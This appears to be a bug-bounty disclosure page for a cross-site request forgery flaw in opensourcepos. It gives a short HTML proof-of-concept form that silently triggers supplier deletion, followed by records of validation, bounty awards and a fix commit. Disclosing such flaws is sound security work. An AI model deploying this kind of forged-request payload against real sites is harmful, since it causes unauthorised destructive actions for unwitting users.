Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021

Description

Attacker able to delete supplier with CSRF attack

Proof of Concept

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/remove_supplier">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

We have contacted a member of the opensourcepos team and are waiting to hear back a year ago

jekkos validated this vulnerability a year ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

jekkos marked this as fixed with commit 329f17 a year ago

jekkos has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation